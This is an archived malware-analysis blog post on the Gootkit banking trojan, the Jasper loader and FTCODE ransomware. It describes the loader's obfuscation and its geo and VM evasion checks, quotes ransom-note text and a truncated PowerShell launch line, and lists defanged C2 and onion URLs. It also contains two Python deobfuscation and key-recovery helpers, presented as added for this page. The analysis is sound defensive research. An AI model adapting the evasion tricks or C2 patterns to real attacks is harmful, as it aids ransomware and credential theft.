{
	"id": "99a40f72-4eb3-4c0e-b382-d95a05287cc5",
	"created_at": "2026-04-06T00:21:44.269463Z",
	"updated_at": "2026-04-10T13:11:56.508574Z",
	"deleted_at": null,
	"sha1_hash": "aa3334c5873edfa72f1878373ca8d0613de15c04",
	"title": "Nicht so goot - breaking down gootkit and jasper (+ ftcode)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2107466,
	"plain_text": "Nicht so goot - breaking down gootkit and jasper (+ ftcode)\r\nBy f0wL\r\nPublished: 2019-10-02 · Archived: 2026-04-05 23:42:42 UTC\r\nWed 02 October 2019 in Banking-Malware\r\nPun intended. Gootkit is one of the most widespread banking malware families at the moment and I deemed it a good opportunity to deobfuscate a bit of scrambled code.\r\nA short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws, as owning malware binaries/sources might be illegal depending on where you live.\r\nGootkit Stage 3 Sample available @ Hybrid Analysis --\u003e 3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 1 of 10\r\nWith the obfuscated JavaScript and VBScript samples I thought it would be a good idea to build a simple Python script to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script; other than that, forks and PRs are always welcome as well.\r\nThe VBScript first stage isn't really that sophisticated. Each of its 2947 lines holds one ASCII character, represented as an integer with 302 added to it. Each integer is converted back to a char and appended to the string fjuu, which gets executed via WScript once decoding is complete. The dumped command is once again a long PowerShell command with a base64 segment.\r\nThis PS snippet will download and display the weird online pet store order confirmation and the second stage of the Jasper Loader, an obfuscated JavaScript file.\r\nThe JS stage includes a few unused variables, entangled functions and scrambled strings. These strings are then concatenated into one big string in an array, which in turn is fed through two replacement functions and then split. The last step is a loop that calls the geejc function and selects every second character from the array to form the final PowerShell payload. The PS command contains a base64 encoded string which I decoded as a separate step in the script. Pretty easy so far...\r\nProbably the easiest way to identify a Jasper Loader is by looking at the characteristic conditional at the top of the decoded base64 segment. First it checks the localization of the UI and exits on systems from China, Romania, Russia, Ukraine or Belarus. Jasper will also quit if the WMI Computer_Model query returns a string related to a VM guest system, for anti-analysis and sandbox evasion purposes.\r\nA Setup Information (.inf) file dropped by the PE payload.\r\nLooks like we've got some anti-analysis tricks with this binary as well... either way, IDA Free does not really like it and complains about being unable to fetch the imports 🤔 Scrambled Import Address Table anyone? We'll take a closer peek later.\r\nAnother version of the Gootkit/Jasper combo surfaced on September 26th when they swapped out the 3rd stage payload with FTCODE. Contrary to the belief of some researchers, this PowerShell-based ransomware is not new and was first spotted in 2013 by Sophos analysts, as described in this article.
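Before moving on to FTCODE, here is an added Python example, written for this page and not taken from the author's deobfuscation script, that walks the Jasper chain described above in reverse: subtract the 302 offset from the stage-1 integers, keep every second character of the stage-2 array, and base64/UTF-16LE-decode the -EncodedCommand argument of the resulting PowerShell line. It then runs a heuristic for the two bail-out checks that identify a Jasper Loader. Assumed, because the post does not quote them: that the every-second loop starts at index 0, the culture codes zh/ro/ru/uk/be, the VM vendor words, and the whole constructed sample (built inside the block with the inverse of each layer; the real scripts also use the geejc function and two replacement passes, which are not modelled).

```python
import base64
import re

# Assumption from the post: each stage-1 line is one ASCII char stored as ord(c) + 302.
OFFSET = 302
SQ = chr(39)   # single quote, built with chr() so the literals stay escape-free
NL = chr(10)


def decode_vbs_stage(numbers):
    # Stage 1 (VBScript): subtract the offset and rebuild the string the loader executes.
    return ''.join(chr(n - OFFSET) for n in numbers)


def encode_vbs_stage(text):
    # Inverse of decode_vbs_stage, used only to build the constructed sample below.
    return [ord(c) + OFFSET for c in text]


def pick_every_second(scrambled, start=0):
    # Stage 2 (JavaScript): the final loop keeps every second character of the
    # scrambled array. The post does not say whether it starts at index 0 or 1;
    # index 0 is assumed and exposed as a parameter.
    return ''.join(scrambled[start::2])


ENC_ARG = re.compile('-e(?:nc|ncodedcommand)? +([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(ps_command):
    # Stage 3: powershell -enc / -EncodedCommand carries base64 over UTF-16LE text.
    m = ENC_ARG.search(ps_command)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode('utf-16-le')


def unwrap_chain(numbers, start=0):
    # The full Jasper decoding chain as the post describes it, end to end.
    return decode_encoded_command(pick_every_second(decode_vbs_stage(numbers), start))


# Assumed markers for the two Jasper bail-out checks: a UI-culture test for
# CN/RO/RU/UA/BY and a WMI computer-model test for VM guests. The exact strings
# in the real sample are not quoted in the post, so this is a heuristic.
CULTURE_CODES = {'zh', 'ro', 'ru', 'uk', 'be'}
VM_WORDS = ('virtual', 'vmware', 'virtualbox', 'qemu', 'kvm', 'hyper-v', 'xen')


def jasper_markers(script):
    low = script.lower()
    tokens = set(re.findall('[a-z-]+', low))
    culture_bailout = 'culture' in low and len(tokens & CULTURE_CODES) >= 3
    vm_bailout = ('win32_computersystem' in low or 'computer_model' in low) and any(w in low for w in VM_WORDS)
    return {'culture_bailout': culture_bailout, 'vm_bailout': vm_bailout}


def build_constructed_sample():
    # Constructed, not a real sample: an inner script with both Jasper checks,
    # wrapped with the post's three layers in reverse (base64/UTF-16LE inside a
    # powershell -enc command, junk interleaved at every odd index, then +302).
    inner = ('if ((Get-UICulture).Name -match ' + SQ + 'zh|ro|ru|uk|be' + SQ + ') { exit }' + NL +
             'if ((Get-WmiObject Win32_ComputerSystem).Model -match ' + SQ + 'Virtual|VMware' + SQ + ') { exit }' + NL +
             'Start-Process notepad.exe')
    enc = base64.b64encode(inner.encode('utf-16-le')).decode('ascii')
    ps = 'powershell -nop -w hidden -enc ' + enc
    scrambled = ''.join(c + 'x' for c in ps)
    return encode_vbs_stage(scrambled), inner


if __name__ == '__main__':
    numbers, inner = build_constructed_sample()
    recovered = unwrap_chain(numbers)
    assert recovered == inner
    print(recovered)
    print(jasper_markers(recovered))
```

Run as a script it rebuilds the inner PowerShell from the shifted integers and reports both bail-out markers as present; on a real stage-1 file, read the integers into numbers and call unwrap_chain(numbers, 1) if the recovered text looks wrong with the default start index.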
The link to the Any.Run analysis of the malicious Word document can be found here.\r\nThe malicious macro in the Word document will download and execute the FTCODE PowerShell ransomware right away.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $atwsxvg = [string][System.Text.Encoding\r\nMaybe a reference to the developer/group behind this attack? We won't know for sure, but the string \"BXCODE hack your system\" is present in all recent occurrences of FTCODE.\r\nLadies and gentlemen, this is the part of the code that gave today's ransomware its name. It will append the extension .FTCODE to every encrypted file and drop an HTML ransom note in the respective directories.\r\nAgain, this PS script also features the \"kill switch\"/evasion technique found in Jasper.\r\nCommunication with the C\u0026C server is accomplished via System.Net.WebClient and POST requests to the hardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted in plain text, so a packet capture would get you the key and therefore your data back without paying the cyber-criminals :D\r\nLooks like FTCODE actually has a killswitch: if a file called w00log03.tmp is present in %PUBLIC%\\OracleKit, the ransomware will create a new file called good_day.log and exit.\r\nAnother run-of-the-mill behaviour of ransomware these days is to disable the recovery mode and delete the system backups and shadow copies. So nothing really new here either.\r\nFTCODE will encrypt all files with the following extensions:\r\n\"*.sql\",\"*.mp4\",\"*.7z\",\"*.rar\",\"*.m4a\",\"*.wma\",\"*.avi\",\"*.wmv\",\"*.csv\",\"*.d3dbsp\",\"*.zip\",\"*.sie\",\"*\r\nThe ransom note, dropped as an HTML file with the filename READ_ME_NOW.htm:\r\nAll your files was encrypted!\r\nYour personal ID: $whyjfdxez\r\nYour personal KEY: $gdejthseee\r\n1. Download Tor browser - https://www.torproject.org/download/\r\n2. Install Tor browser\r\n3. Open Tor Browser\r\n4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.o\r\n5. Follow the instructions on this page\r\n***** Warning *****\r\nDo not rename files\r\nDo not try to back your data using third-party software, it may cause permanent data loss(If you d\r\nAs evidence, we can for free back one file\r\nDecoders of other users is not suitable to back your files - encryption key is created on your com\r\nTwitter user treetone alerted possible victims not to pay the ransom since he did not receive a decryptor after paying the ransom for a client.
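Rather than paying, anyone holding a capture of the plaintext beacon described above can pull the key out of it. The following added Python example (written for this page, not FTCODE's or the author's code) reassembles HTTP requests from constructed wire data and extracts the victim ID and key from a guid parameter shaped like the placeholder in the IOC list, guid=VICTIM-ID+PASSWD. Assumptions not stated in the post: the beacon is plain HTTP, the parameters sit in a form body, query string or directly after the slash as the IOC shows, the ID is a UUID string, and ID and key are joined by a literal plus sign; the request bytes, header framing, ID and key values are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

CRLF = chr(13) + chr(10)   # built with chr() so the literals stay escape-free
UUID_RE = re.compile('[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', re.I)


def split_http_request(raw):
    # raw: the bytes of one HTTP request as reassembled from a capture (plain HTTP,
    # which is what the post describes; a TLS beacon would need the session keys).
    text = raw.decode('latin-1')
    head, _, body = text.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    parts = lines[0].split(' ', 2)
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers, body


def parse_form(s):
    # key=value&key=value with percent-decoding. unquote (not unquote_plus) is used
    # on purpose: the IOC list shows the id and key joined by a literal plus sign.
    out = {}
    for pair in s.split('&'):
        if pair:
            k, _, v = pair.partition('=')
            out[unquote(k)] = unquote(v)
    return out


def extract_beacon(raw):
    # Returns {host, victim_id, key} for a request whose guid parameter looks like
    # the placeholder in the IOC list (guid=VICTIM-ID+PASSWD), else None.
    req = split_http_request(raw)
    if req is None:
        return None
    method, target, headers, body = req
    url = urlsplit(target)
    params = {}
    # The IOC shows the parameters directly after the slash, so the path is tried
    # as well as the query string and, for POST, the form body.
    for chunk in (url.path.lstrip('/'), url.query, body if method == 'POST' else ''):
        params.update(parse_form(chunk))
    guid = params.get('guid', '')
    victim_id, _, key = guid.partition('+')
    if not key or not UUID_RE.fullmatch(victim_id):
        return None
    return {'host': headers.get('host', url.netloc), 'victim_id': victim_id, 'key': key}


def recover_keys(segments):
    # Walk every reassembled request in the capture and keep the FTCODE beacons.
    found = []
    for raw in segments:
        beacon = extract_beacon(raw)
        if beacon:
            found.append(beacon)
    return found


def build_constructed_capture():
    # Constructed wire data, not a real pcap; the hosts stay defanged and the id/key
    # values are made up. One decoy image fetch and one plaintext beacon.
    victim_id = '1b4e28ba-2fa1-11d2-883f-b9a761bde3fb'
    key = 'n3EkQ8u0ZkX7'
    body = 'ver=926.3&guid=' + victim_id + '+' + key
    get = CRLF.join(['GET /resources/wp-content/uploads/2017/04/feat-chewy-shipping-confirmation.jpg HTTP/1.1',
                     'Host: rejoiner[.]com', '', ''])
    post = CRLF.join(['POST / HTTP/1.1', 'Host: aweb.theshotboard[.]info',
                      'Content-Type: application/x-www-form-urlencoded',
                      'Content-Length: ' + str(len(body)), '', body])
    return [get.encode('latin-1'), post.encode('latin-1')], victim_id, key


if __name__ == '__main__':
    segments, _, _ = build_constructed_capture()
    for beacon in recover_keys(segments):
        print(beacon['host'], beacon['victim_id'], beacon['key'])
```

Run as a script it prints the defanged C2 host, the constructed victim ID and the key; on real traffic, feed recover_keys() the request payloads exported per TCP stream from your capture tool. The decoy image fetch is skipped because it carries no guid parameter.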
There are, however, different reports about what happens after paying the ransom, as shown below.\r\nAs reported by BleepingComputer forum user Hidemik, paying the ransom will redirect the victim to a page with the instructions to run the following PowerShell script (I removed the Base64 encoded RSA key):\r\nIOCs\r\nGootkit (SHA256)\r\n3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37\r\nMalicious .docm (SHA256)\r\nbf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175\r\nRelated Files (SHA256)\r\n93aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e --\u003e feat-chewy-shipping-confirmation\r\n3721af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f --\u003e index.js\r\ne6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e --\u003e invoice_confirmation_53467823886\r\nURLs\r\nhxxp://getpdfreader.13stripesbrewery[.]com/pdf.php?MTo7Njc2NDk3\r\nhxxp://rejoiner[.]com/resources/wp-content/uploads/2017/04/feat-chewy-shipping-confirmation.jpg\r\nhxxp://ont.carolinabeercompany[.]com/bolp.cab\r\nhxxp://wws.tkgventures[.]com/ (Source Port: 49207/ 50769, 194.76.224[.]108:80)\r\nhxxp://z2g3mtkwotm4[.]top/ (Source Port: 52742/ 52745, 35.187.36[.]248:80)\r\nhxxps://adp.reevesandcompany[.]com/rbody320 (176.10.125[.]87:443)\r\nhxxp://picturecrafting[.]site (208.91.197[.]91)\r\nhxxp://ogy5mtkwotm4[.]top\r\nhxxp://mjvjmtkwotm4[.]top\r\nhxxp://otnhmtkwotm4[.]top\r\nhxxp://zgzimtkwotm4[.]top\r\nhxxp://cofee.theshotboard[.]net/?need=uuid\u0026vid=dc1:loadjs\u0026\r\nhxxp://aweb.theshotboard[.]info/?page=xing\u0026vid=dc1:load\r\nhxxp://aweb.theshotboard[.]info/ver=926.3\u0026guid=VICTIM-ID+PASSWD\r\nhxxp://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd[.]onion/?guid=VICTIM-ID\r\nhxxp://home.tith[.]in/seven.sat\r\nhxxp://connect.simplebutmatters[.]com (185.158.248[.]151)\r\nhxxp://home.isdes[.]com (31.214.157[.]3)\r\nhxxp://home.southerntransitions[.]net (31.214.157[.]3)\r\nSource: https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html"
	],
	"report_names": [
		"nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434904,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.pdf",
		"text": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.txt",
		"img": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.jpg"
	}
}